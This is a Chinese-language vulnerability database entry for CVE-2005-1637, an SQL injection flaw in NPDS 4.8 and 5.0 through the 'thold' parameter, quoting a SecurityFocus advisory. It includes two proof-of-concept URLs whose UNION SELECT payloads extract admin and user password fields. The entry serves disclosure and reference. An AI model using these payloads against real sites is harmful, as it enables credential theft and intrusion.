NPDS SQL注入漏洞

NPDS SQL注入漏洞

漏洞ID 1108786 漏洞类型 SQL注入
发布时间 2005-05-16 更新时间 2005-10-20
图片[1]-NPDS SQL注入漏洞-安全小百科CVE编号 CVE-2005-1637
图片[2]-NPDS SQL注入漏洞-安全小百科CNNVD-ID CNNVD-200505-1076
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25672
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1076
|漏洞详情
NPDS4.8和5.0版本存在多个SQL注入漏洞,远程攻击者可以通过传给(1)comments.php或(2)pollcomments.php的thold参数来执行任意SQL命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/13649/info
 
NPDS is prone to an SQL injection vulnerability.
 
This issue is due to a failure in the application to properly sanitize user-supplied input to the 'thold' parameter.
 
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
 
All versions are considered to be vulnerable at the moment.

http://www.example.com/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM %20authors

http://www.example.com/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u
|参考资料

来源:www.npds.org
链接:http://www.npds.org/article.php?sid=1258
来源:SECTRACK
名称:1013973
链接:http://securitytracker.com/id?1013973

相关推荐: Golden FTP Server Pro 2.52 – ‘USER’ Remote Buffer Overflow

Golden FTP Server Pro 2.52 – ‘USER’ Remote Buffer Overflow 漏洞ID 1055066 漏洞类型 发布时间 2005-04-27 更新时间 2005-04-27 CVE编号 N/A CNNVD-ID N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享